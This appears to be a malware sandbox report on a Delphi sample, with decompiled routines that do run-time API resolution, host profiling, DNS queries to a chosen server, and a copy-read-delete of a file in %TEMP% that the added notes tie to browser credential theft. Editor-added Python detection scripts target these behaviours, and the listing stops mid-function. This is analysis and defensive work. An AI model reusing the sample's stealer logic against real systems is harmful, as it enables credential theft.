                            • RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                            • API String ID: 3677997916-4173385793
                            • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                            • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                            • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                            • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 66%
                            			E00415CA0(void* __eax, void* __ebx, void* __esi, void* __eflags) {
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				char _v68;
                            				char _v72;
                            				_Unknown_base(*)()* _t13;
                            				intOrPtr _t36;
                            				void* _t38;
                            				void* _t39;
                            				void* _t41;
                            				void* _t43;
                            
                            				_t43 = __eflags;
                            				_v72 = 0;
                            				_t38 = __eax;
                            				 *[fs:eax] = _t41 + 0xffffffbc;
                            				_t13 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                            				E004028E0( &_v68, 0x40);
                            				_v68 = 0x40;
                            				 *_t13( &_v68,  *[fs:eax], 0x415d2a, _t41, __esi, __ebx, _t39);
                            				E0040709C(E004045CC(_v60, _v56, 0x100000, 0), _t13,  &_v72, _t38, _t43);
                            				E0040377C(_t38, _v72);
                            				_pop(_t36);
                            				 *[fs:eax] = _t36;
                            				_push(E00415D31);
                            				return E00403BDC( &_v72);
                            			}

                            Instruction addresses (gutter of the listing above): 0x00415ca0 - 0x00415d29

                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,00415D2A,?,?,?), ref: 00415CC7
                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00415CCD
                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressFreeLibraryLoadProcString
                            • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                            • API String ID: 923276998-3878206809
                            • Opcode ID: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
                            • Instruction ID: 391148e63b22df71c2771543718f35c183a5c4b34bdda626484a7ccee0bd3fce
                            • Opcode Fuzzy Hash: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
                            • Instruction Fuzzy Hash: 55017571A006089BD711EBA1DD46BDE77B9EB88704F51453AF500B32D1E67C6D018659
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 33%
                            			E00406678(void* __ecx) {
                            				signed char _t3;
                            				signed char _t7;
                            				intOrPtr* _t8;
                            				signed char* _t11;
                            
                            				_t8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                            				_t3 = 0;
                            				 *_t11 = 0;
                            				if(_t8 != 0) {
                            					_push(_t11);
                            					_push(GetCurrentProcess());
                            					if( *_t8() == 0 ||  *_t11 == 0) {
                            						_t7 = 0;
                            					} else {
                            						_t7 = 1;
                            					}
                            					_t3 =  ~_t7;
                            					asm("sbb eax, eax");
                            					 *_t11 = _t3;
                            				}
                            				asm("sbb eax, eax");
                            				return _t3 + 1;
                            			}

                            Instruction addresses (gutter of the listing above): 0x0040668f - 0x004066c3

                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A2C,00000000,00416CF0,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406684
                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040668A
                            • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A2C,00000000,00416CF0,?,Windows : ,?,,?), ref: 0040669B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressCurrentHandleModuleProcProcess
                            • String ID: IsWow64Process$kernel32.dll
                            • API String ID: 4190356694-3024904723
                            • Opcode ID: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
                            • Instruction ID: e294de711800d21e639c3a9fa9d3456d397d027599023024eec292f5251465af
                            • Opcode Fuzzy Hash: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
                            • Instruction Fuzzy Hash: 1FE09BB16147019EDB007BB58C41B3B21CCAB65305F031C3EA082F12C0D97EC8908A6D
                            Uniqueness

                            Uniqueness Score: -1.00%
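                            Added example (editor's code, not from the report or the sample): the functions E0041757C, E00415CA0 and E00406678 above resolve their APIs at run time with LoadLibraryA/GetModuleHandleA plus GetProcAddress, so DnsQuery_A, GlobalMemoryStatusEx and IsWow64Process are absent from the PE import table and an IAT-only triage of this binary would not list them. In E00415CA0 the struct handed to GlobalMemoryStatusEx gets dwLength = 0x40 (sizeof MEMORYSTATUSEX) and the 64-bit field at +8, ullTotalPhys, is divided by 0x100000, i.e. physical memory is reported in MiB; that reading is inferred from the listing, the report does not state it. The E00402AC4 registry read of SOFTWARE\Borland\Delphi\RTL\FPUMaskValue is Delphi RTL start-up code (System.pas FpuInit), present in every Delphi executable, not sample logic. The script below recovers dynamically resolved imports from a raw memory dump by pairing each "*.dll" literal with the export-looking literal beside it. SAMPLE_DUMP is a constructed byte string, and WATCHLIST and its notes are the editor's, not the report's.

```python
"""Recover LoadLibraryA/GetProcAddress-style dynamic imports from a memory dump.

Added example; not code from the report or from the sample. The three
resolutions in the listings above (dnsapi.dll/DnsQuery_A,
kernel32.dll/GlobalMemoryStatusEx, kernel32.dll/IsWow64Process) never reach
the PE import table, so IAT-only triage misses them. Delphi emits a routine's
string literals next to each other, so pairing every "*.dll" literal with the
export-looking literal beside it recovers the dynamically resolved set from
a raw dump. It is a heuristic: neighbours are candidates until confirmed.
"""
import re
from dataclasses import dataclass

# Exports named in the decompiled functions on this page; the notes are the
# editor's reading of what each one is used for, not text from the report.
WATCHLIST = {
    "DnsQuery_A": "DNS lookup via dnsapi.dll; caller may supply its own server list",
    "GlobalMemoryStatusEx": "physical memory size for host profiling",
    "IsWow64Process": "32-bit process on 64-bit Windows check",
}

DLL_RE = re.compile(rb"^[A-Za-z0-9_]+\.dll$", re.IGNORECASE)
# Win32 export names: capitalised, alphanumeric/underscore, no dots or slashes.
EXPORT_RE = re.compile(rb"^[A-Z][A-Za-z0-9_]{4,}$")


@dataclass(frozen=True)
class DynImport:
    dll: str
    export: str
    offset: int          # offset of the export literal in the dump
    note: str            # non-empty when the export is on the watchlist


def ascii_strings(buf, min_len=4):
    """Yield (offset, bytes) for NUL-terminated printable runs (like `strings -a`)."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}\x00" % min_len, buf):
        yield m.start(), m.group()[:-1]


def recover_dynamic_imports(buf, window=1):
    """Pair each DLL literal with export-like literals within `window` strings.

    Both directions are scanned because the compiler may place the export
    name before or after the DLL name, depending on argument evaluation order.
    """
    strs = list(ascii_strings(buf))
    found = set()
    for i, (_, s) in enumerate(strs):
        if not DLL_RE.match(s):
            continue
        for j in range(max(0, i - window), min(len(strs), i + window + 1)):
            off, cand = strs[j]
            if j == i or DLL_RE.match(cand) or not EXPORT_RE.match(cand):
                continue
            name = cand.decode()
            found.add(DynImport(s.decode().lower(), name, off, WATCHLIST.get(name, "")))
    return sorted(found, key=lambda d: d.offset)


def watchlisted(buf):
    """Just the (dll, export) pairs whose export is on the watchlist."""
    return [(d.dll, d.export) for d in recover_dynamic_imports(buf) if d.note]


# Constructed stand-in for a dump: literals laid out as a Delphi binary would,
# with code bytes in between. These are not bytes from the analysed sample.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"dnsapi.dll\x00\x00\x00DnsQuery_A\x00"
    + b"\x90" * 40
    # Delphi RTL start-up strings (FpuInit), not an import: they sit next to
    # the kernel32 literal here to show why candidates still need confirming.
    + b"SOFTWARE\\Borland\\Delphi\\RTL\x00FPUMaskValue\x00"
    + b"\xcc" * 8
    + b"kernel32.dll\x00GlobalMemoryStatusEx\x00"
    + b"\x00" * 32
    + b"IsWow64Process\x00kernel32.dll\x00"      # export literal before the DLL name
)

if __name__ == "__main__":
    for d in recover_dynamic_imports(SAMPLE_DUMP):
        mark = "WATCH" if d.note else "check"
        print(f"{mark}  {d.dll:<13} {d.export:<22} @0x{d.offset:06x}  {d.note}")
```

                            Because it is a heuristic, entries without a watchlist note (FPUMaskValue in the constructed data) are candidates to confirm against the dump's code, not findings; the authoritative check is the cross-reference from the GetProcAddress call site, as in the ref: addresses the report gives for each call.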

                            C-Code - Quality: 44%
                            			E004112B8(signed int __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				intOrPtr _v117;
                            				signed int _t66;
                            				signed int _t67;
                            				WCHAR* _t87;
                            				intOrPtr* _t102;
                            				intOrPtr _t104;
                            				intOrPtr* _t106;
                            				intOrPtr* _t110;
                            				intOrPtr* _t138;
                            				intOrPtr* _t142;
                            				intOrPtr _t144;
                            				intOrPtr* _t146;
                            				void* _t148;
                            				intOrPtr* _t150;
                            				intOrPtr* _t154;
                            				void* _t156;
                            				intOrPtr* _t161;
                            				intOrPtr* _t167;
                            				intOrPtr* _t173;
                            				void* _t175;
                            				intOrPtr* _t179;
                            				void* _t183;
                            				intOrPtr _t204;
                            				intOrPtr _t206;
                            				void* _t211;
                            				intOrPtr _t217;
                            				intOrPtr _t221;
                            				intOrPtr _t222;
                            				void* _t223;
                            				void* _t224;
                            
                            				_t219 = __esi;
                            				_t181 = __ebx;
                            				_pop(_t222);
                            				 *__eax =  *__eax + __eax;
                            				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __eax;
                            				 *__eax =  *__eax + __eax;
                            				 *__ecx =  *__ecx + __ecx;
                            				 *__eax =  *__eax | __eax;
                            				 *__eax =  *__eax + __eax;
                            				_t66 = __eax;
                            				 *_t66 =  *_t66 + _t66;
                            				_t67 = _t66 | 0x00000a00;
                            				 *_t67 =  *_t67 + _t67;
                            				_v117 = _v117 + __edx;
                            				_t221 = _t222;
                            				_t183 = 0xa;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t183 = _t183 - 1;
                            					_t232 = _t183;
                            				} while (_t183 != 0);
                            				_push(_t183);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v12 = __edx;
                            				_v8 = _t67;
                            				E00404150( &_v8);
                            				_push(_t221);
                            				_push(0x4115ab);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t222;
                            				E00403BDC( &_v28);
                            				_push(_t221);
                            				_push(0x411526);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t222;
                            				E0040709C(GetTickCount(), __ebx,  &_v52, __esi, _t232);
                            				_push(_v52);
                            				E00406FDC( &_v56, __ebx, __edi, __esi, _t232);
                            				_push(_v56);
                            				_push(L".tmp");
                            				E00403E78();
                            				E004078D8(_v8, _t181,  &_v40, _t232);
                            				E004062FC(L"%TEMP%",  &_v64, _t232);
                            				_push(_v64);
                            				_push(0x4115e4);
                            				_push(_v32);
                            				E00403E78();
                            				E004078D8(_v60, _t181,  &_v44, _t232);
                            				_t87 = E00403D98(_v44);
                            				CopyFileW(E00403D98(_v40), _t87, 0xffffffff);
                            				E0040377C( &_v68, _v44);
                            				E00404B58(_v68, _t181, _t183,  &_v36, _t219, _t232);
                            				E00403D88( &_v72, _v36);
                            				if(E0040776C(_v72, _t181, _t183) != 0) {
                            					_t102 =  *0x41b140; // 0x41ca20
                            					_t104 =  *((intOrPtr*)( *_t102))(E00403990(_v36),  &_v16);
                            					_t223 = _t222 + 8;
                            					__eflags = _t104;
                            					if(_t104 == 0) {
                            						_t138 =  *0x41b390; // 0x41c934
                            						_t142 =  *0x41b2d4; // 0x41ca28
                            						_t144 =  *((intOrPtr*)( *_t142))(_v16, E00403990( *_t138), 0xffffffff,  &_v20,  &_v24);
                            						_t224 = _t223 + 0x14;
                            						__eflags = _t144;
                            						if(_t144 == 0) {
                            							while(1) {
                            								_t146 =  *0x41b384; // 0x41ca2c
                            								_t148 =  *((intOrPtr*)( *_t146))(_v20);
                            								__eflags = _t148 - 0x64;
                            								if(_t148 != 0x64) {
                            									goto L12;
                            								}
                            								_t150 =  *0x41b414; // 0x41ca34
                            								_t154 =  *0x41b1dc; // 0x41ca30
                            								_t156 =  *((intOrPtr*)( *_t154))(_v20, 3,  *((intOrPtr*)( *_t150))(_v20, 3));
                            								_pop(_t211);
                            								E0040A610(_t156,  &_v48, _t211);
                            								E00403D88( &_v76, _v48);
                            								_t161 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v80,  *((intOrPtr*)( *_t161))(_v20, 0, 0x4115ec, _v76, _v28));
                            								_t167 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v84,  *((intOrPtr*)( *_t167))(_v20, 1, 0x4115ec, _v80));
                            								_t173 =  *0x41b1dc; // 0x41ca30
                            								_t175 =  *((intOrPtr*)( *_t173))(_v20, 2, 0x4115f8, _v84);
                            								_t224 = _t224 + 0x28;
                            								E00403CF4( &_v88, _t175);
                            								_push(_v88);
                            								_push(L"\r\n\r\n");
                            								E00403E78();
                            								_t179 =  *0x41b1cc; // 0x41b0b4
                            								 *_t179 =  *_t179 + 1;
                            								__eflags =  *_t179;
                            							}
                            						}
                            					}
                            					L12:
                            					_t106 =  *0x41b46c; // 0x41ca38
                            					 *((intOrPtr*)( *_t106))(_v20);
                            					_t110 =  *0x41b20c; // 0x41ca24
                            					 *((intOrPtr*)( *_t110))(_v16);
                            					_pop(_t204);
                            					 *[fs:eax] = _t204;
                            					E00403C18(_v12, _v28);
                            					DeleteFileW(E00403D98(_v44));
                            				} else {
                            					_pop(_t217);
                            					 *[fs:eax] = _t217;
                            				}
                            				_pop(_t206);
                            				 *[fs:eax] = _t206;
                            				_push(E004115B2);
                            				E00403BF4( &_v88, 5);
                            				E004034E4( &_v68);
                            				E00403BF4( &_v64, 4);
                            				E004034E4( &_v48);
                            				E00403BF4( &_v44, 2);
                            				E004034E4( &_v36);
                            				E00403BF4( &_v32, 2);
                            				return E00403BDC( &_v8);
                            			}

                            Instruction addresses (gutter of the listing above): 0x004112b8 - 0x004115aa

                            APIs
                            • GetTickCount.KERNEL32 ref: 00411315
                            • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CopyCountFileTick
                            • String ID: %TEMP%$.tmp
                            • API String ID: 3448371392-3650661790
                            • Opcode ID: f6c8deb41282be5770c048f0b97447003eceaaf2e792347eab8b86e35438337d
                            • Instruction ID: 1a8257de2d60cbb0d3980c7fc3a6a2139cbe43d2aa84506a9aa105e6b37338cb
                            • Opcode Fuzzy Hash: f6c8deb41282be5770c048f0b97447003eceaaf2e792347eab8b86e35438337d
                            • Instruction Fuzzy Hash: 1B414231904248AFDB01FFA2D852ACDBBB9EF45309F51447BF500B76A2D63CAE058B25
                            Uniqueness

                            Uniqueness Score: -1.00%
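                            Added example covering two behaviours, the one in this listing and the one in E0041757C above; editor's code, not from the report or the sample. In E0041757C the argument pushed fourth to DnsQuery_A is a heap block written as {1, <addr>}, which matches the IP4_ARRAY pExtra parameter (AddrCount = 1, one server address), so the A-record lookup (wType = 1) leaves the sample's own process for a server the sample chooses rather than going through the configured resolver; this is inferred from the argument layout. E004112B8 converts GetTickCount() to a string, appends ".tmp", prefixes the expansion of "%TEMP%", CopyFileW()s the caller's file to that path, reads it through the function-pointer table, then DeleteFileW()s it. The rules below run over a constructed Sysmon-like event stream (field names are the example's own); CONFIGURED_RESOLVERS, the svchost.exe resolver image and the all-digit file-name pattern are assumptions stated in the code.

```python
"""Host-telemetry rules for two behaviours visible in the decompiled listings.

Added example, not code from the report or from the sample. Two rules run over
a constructed Sysmon-like event stream; the field names (t, type, pid, image,
dip, dport, path) are this example's own, not a real schema.

  R1  E0041757C hands DnsQuery_A its own server list (inference from the
      argument layout: the block filled as {AddrCount=1, AddrArray[0]=<addr>}
      is the IP4_ARRAY pExtra argument), so the lookup leaves from the
      sample's process toward a server the host was never configured with.
      Flag port-53 flows from any process other than the DNS Client service
      host (svchost.exe), and any port-53 flow to an unconfigured server.
  R2  E004112B8 builds "%TEMP%\\<string from GetTickCount()>.tmp", CopyFileW()s
      a target file into it, reads it, then DeleteFileW()s it. Flag a process
      that creates such a file and deletes it again within a short window.
      Assumption: the tick-count string reaches the file name unchanged
      (E00406FDC's effect on it is not visible in the listing), hence the
      all-digit pattern; adjust TEMP_TMP_RE if a sample shows otherwise.
"""
import re
from collections import defaultdict

CONFIGURED_RESOLVERS = {"10.0.0.53", "10.0.0.54"}   # assumed host NIC configuration
DNS_SERVICE_IMAGE = r"c:\windows\system32\svchost.exe"
TEMP_TMP_RE = re.compile(r"\\temp\\\d+\.tmp$", re.IGNORECASE)
MAX_CREATE_TO_DELETE_SECONDS = 120


def parse_event(line):
    """Parse `key=value` pairs; values containing spaces are double-quoted."""
    return {m.group(1): m.group(2).strip('"')
            for m in re.finditer(r'(\w+)=("[^"]*"|\S+)', line)}


def rule_direct_dns(events):
    """R1: (pid, image, dst ip, reasons) for suspicious port-53 connections."""
    hits = []
    for ev in events:
        if ev.get("type") != "NetworkConnect" or ev.get("dport") != "53":
            continue
        reasons = []
        if ev["image"].lower() != DNS_SERVICE_IMAGE:
            reasons.append("non-resolver process")
        if ev["dip"] not in CONFIGURED_RESOLVERS:
            reasons.append("unconfigured server")
        if reasons:
            hits.append((int(ev["pid"]), ev["image"], ev["dip"], reasons))
    return hits


def rule_temp_copy_and_delete(events):
    """R2: (pid, image, path, seconds alive) for %TEMP%\\<digits>.tmp create+delete."""
    created = defaultdict(dict)          # pid -> lower-cased path -> create time
    hits = []
    for ev in events:
        path = ev.get("path", "")
        if not TEMP_TMP_RE.search(path):
            continue
        pid, t, key = int(ev["pid"]), int(ev["t"]), path.lower()
        if ev["type"] == "FileCreate":
            created[pid][key] = t
        elif ev["type"] == "FileDelete":
            t0 = created[pid].pop(key, None)
            if t0 is not None and t - t0 <= MAX_CREATE_TO_DELETE_SECONDS:
                hits.append((pid, ev["image"], path, t - t0))
    return hits


# Constructed events (t = epoch seconds); not telemetry from the sandbox run.
SAMPLE_EVENTS = """\
t=1000 type=NetworkConnect pid=820  image="C:\\Windows\\System32\\svchost.exe" dip=10.0.0.53 dport=53
t=1001 type=NetworkConnect pid=4312 image="C:\\Users\\u\\Desktop\\sample.exe" dip=198.51.100.7 dport=53
t=1002 type=FileCreate     pid=4312 image="C:\\Users\\u\\Desktop\\sample.exe" path="C:\\Users\\u\\AppData\\Local\\Temp\\1854125.tmp"
t=1003 type=FileDelete     pid=4312 image="C:\\Users\\u\\Desktop\\sample.exe" path="C:\\Users\\u\\AppData\\Local\\Temp\\1854125.tmp"
t=1010 type=FileCreate     pid=5100 image="C:\\Program Files\\Setup\\setup.exe" path="C:\\Users\\u\\AppData\\Local\\Temp\\is-ABC12.tmp"
t=1011 type=FileDelete     pid=5100 image="C:\\Program Files\\Setup\\setup.exe" path="C:\\Users\\u\\AppData\\Local\\Temp\\is-ABC12.tmp"
t=1020 type=NetworkConnect pid=6000 image="C:\\Windows\\System32\\svchost.exe" dip=198.51.100.7 dport=53
"""


def run(text=SAMPLE_EVENTS):
    events = [parse_event(ln) for ln in text.splitlines() if ln.strip()]
    return rule_direct_dns(events), rule_temp_copy_and_delete(events)


if __name__ == "__main__":
    dns_hits, tmp_hits = run()
    for pid, image, dip, reasons in dns_hits:
        print(f"R1 pid={pid} {image} -> {dip}:53 ({', '.join(reasons)})")
    for pid, image, path, alive in tmp_hits:
        print(f"R2 pid={pid} {image} created+deleted {path} within {alive}s")
```

                            The loop in E004112B8 that keeps going while the call through 0x41b384 returns 0x64 and then reads columns 0, 1 and 2 is consistent with an embedded SQLite (sqlite3_step returning SQLITE_ROW = 100, followed by sqlite3_column_* calls), which would also explain the copy to %TEMP% first: browsers keep their credential databases open and locked. That identification is an inference from the constants, not something the report asserts, and neither rule above depends on it. The installer-style "is-ABC12.tmp" events in the constructed stream show why R2 keys on the all-digit name rather than on any short-lived .tmp file.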

                            C-Code - Quality: 44%
                            			E004112C0(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				intOrPtr _v117;
                            				signed int _t66;
                            				signed int _t67;
                            				WCHAR* _t87;
                            				intOrPtr* _t102;
                            				intOrPtr _t104;
                            				intOrPtr* _t106;
                            				intOrPtr* _t110;
                            				intOrPtr* _t138;
                            				intOrPtr* _t142;
                            				intOrPtr _t144;
                            				intOrPtr* _t146;
                            				void* _t148;
                            				intOrPtr* _t150;
                            				intOrPtr* _t154;
                            				void* _t156;
                            				intOrPtr* _t161;
                            				intOrPtr* _t167;
                            				intOrPtr* _t173;
                            				void* _t175;
                            				intOrPtr* _t179;
                            				void* _t182;
                            				intOrPtr _t203;
                            				intOrPtr _t205;
                            				void* _t210;
                            				intOrPtr _t216;
                            				intOrPtr _t220;
                            				intOrPtr _t221;
                            				void* _t222;
                            				void* _t223;
                            
                            				_t218 = __esi;
                            				_t181 = __ebx;
                            				 *__eax =  *__eax | __eax;
                            				 *__eax =  *__eax + __eax;
                            				_t66 = __eax;
                            				 *_t66 =  *_t66 + _t66;
                            				_t67 = _t66 | 0x00000a00;
                            				 *_t67 =  *_t67 + _t67;
                            				_v117 = _v117 + __edx;
                            				_t220 = _t221;
                            				_t182 = 0xa;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t182 = _t182 - 1;
                            					_t230 = _t182;
                            				} while (_t182 != 0);
                            				_push(_t182);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v12 = __edx;
                            				_v8 = _t67;
                            				E00404150( &_v8);
                            				_push(_t220);
                            				_push(0x4115ab);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t221;
                            				E00403BDC( &_v28);
                            				_push(_t220);
                            				_push(0x411526);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t221;
                            				E0040709C(GetTickCount(), __ebx,  &_v52, __esi, _t230);
                            				_push(_v52);
                            				E00406FDC( &_v56, __ebx, __edi, __esi, _t230);
                            				_push(_v56);
                            				_push(L".tmp");
                            				E00403E78();
                            				E004078D8(_v8, _t181,  &_v40, _t230);
                            				E004062FC(L"%TEMP%",  &_v64, _t230);
                            				_push(_v64);
                            				_push(0x4115e4);
                            				_push(_v32);
                            				E00403E78();
                            				E004078D8(_v60, _t181,  &_v44, _t230);
                            				_t87 = E00403D98(_v44);
                            				CopyFileW(E00403D98(_v40), _t87, 0xffffffff);
                            				E0040377C( &_v68, _v44);
                            				E00404B58(_v68, _t181, _t182,  &_v36, _t218, _t230);
                            				E00403D88( &_v72, _v36);
                            				if(E0040776C(_v72, _t181, _t182) != 0) {
                            					_t102 =  *0x41b140; // 0x41ca20
                            					_t104 =  *((intOrPtr*)( *_t102))(E00403990(_v36),  &_v16);
                            					_t222 = _t221 + 8;
                            					__eflags = _t104;
                            					if(_t104 == 0) {
                            						_t138 =  *0x41b390; // 0x41c934
                            						_t142 =  *0x41b2d4; // 0x41ca28
                            						_t144 =  *((intOrPtr*)( *_t142))(_v16, E00403990( *_t138), 0xffffffff,  &_v20,  &_v24);
                            						_t223 = _t222 + 0x14;
                            						__eflags = _t144;
                            						if(_t144 == 0) {
                            							while(1) {
                            								_t146 =  *0x41b384; // 0x41ca2c
                            								_t148 =  *((intOrPtr*)( *_t146))(_v20);
                            								__eflags = _t148 - 0x64;
                            								if(_t148 != 0x64) {
                            									goto L11;
                            								}
                            								_t150 =  *0x41b414; // 0x41ca34
                            								_t154 =  *0x41b1dc; // 0x41ca30
                            								_t156 =  *((intOrPtr*)( *_t154))(_v20, 3,  *((intOrPtr*)( *_t150))(_v20, 3));
                            								_pop(_t210);
                            								E0040A610(_t156,  &_v48, _t210);
                            								E00403D88( &_v76, _v48);
                            								_t161 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v80,  *((intOrPtr*)( *_t161))(_v20, 0, 0x4115ec, _v76, _v28));
                            								_t167 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v84,  *((intOrPtr*)( *_t167))(_v20, 1, 0x4115ec, _v80));
                            								_t173 =  *0x41b1dc; // 0x41ca30
                            								_t175 =  *((intOrPtr*)( *_t173))(_v20, 2, 0x4115f8, _v84);
                            								_t223 = _t223 + 0x28;
                            								E00403CF4( &_v88, _t175);
                            								_push(_v88);
                            								_push(L"\r\n\r\n");
                            								E00403E78();
                            								_t179 =  *0x41b1cc; // 0x41b0b4
                            								 *_t179 =  *_t179 + 1;
                            								__eflags =  *_t179;
                            							}
                            						}
                            					}
                            					L11:
                            					_t106 =  *0x41b46c; // 0x41ca38
                            					 *((intOrPtr*)( *_t106))(_v20);
                            					_t110 =  *0x41b20c; // 0x41ca24
                            					 *((intOrPtr*)( *_t110))(_v16);
                            					_pop(_t203);
                            					 *[fs:eax] = _t203;
                            					E00403C18(_v12, _v28);
                            					DeleteFileW(E00403D98(_v44));
                            				} else {
                            					_pop(_t216);
                            					 *[fs:eax] = _t216;
                            				}
                            				_pop(_t205);
                            				 *[fs:eax] = _t205;
                            				_push(E004115B2);
                            				E00403BF4( &_v88, 5);
                            				E004034E4( &_v68);
                            				E00403BF4( &_v64, 4);
                            				E004034E4( &_v48);
                            				E00403BF4( &_v44, 2);
                            				E004034E4( &_v36);
                            				E00403BF4( &_v32, 2);
                            				return E00403BDC( &_v8);
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 00411315
                            • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CopyCountFileTick
                            • String ID: %TEMP%$.tmp
                            • API String ID: 3448371392-3650661790
                            • Opcode ID: 4109a64c4e7ebea2bd269ab7f72adf152baa53bf738e560ef77c239433b323f7
                            • Instruction ID: e7bb21d7818b23da26e47d5e8aee7b9a5bdfdedc2a4558b21973e4c2dc324f20
                            • Opcode Fuzzy Hash: 4109a64c4e7ebea2bd269ab7f72adf152baa53bf738e560ef77c239433b323f7
                            • Instruction Fuzzy Hash: 01413571904108AFDB01FFA2D842ACDBBB9EF45309F51447BF505B36A2D63CAE068A24
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 43%
                            			E004112C8(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				intOrPtr _v117;
                            				signed int _t66;
                            				WCHAR* _t86;
                            				intOrPtr* _t101;
                            				intOrPtr _t103;
                            				intOrPtr* _t105;
                            				intOrPtr* _t109;
                            				intOrPtr* _t137;
                            				intOrPtr* _t141;
                            				intOrPtr _t143;
                            				intOrPtr* _t145;
                            				void* _t147;
                            				intOrPtr* _t149;
                            				intOrPtr* _t153;
                            				void* _t155;
                            				intOrPtr* _t160;
                            				intOrPtr* _t166;
                            				intOrPtr* _t172;
                            				void* _t174;
                            				intOrPtr* _t178;
                            				void* _t181;
                            				intOrPtr _t202;
                            				intOrPtr _t204;
                            				void* _t209;
                            				intOrPtr _t215;
                            				intOrPtr _t219;
                            				intOrPtr _t220;
                            				void* _t221;
                            				void* _t222;
                            
                            				_t217 = __esi;
                            				_t180 = __ebx;
                            				_t66 = __eax | 0x00000a00;
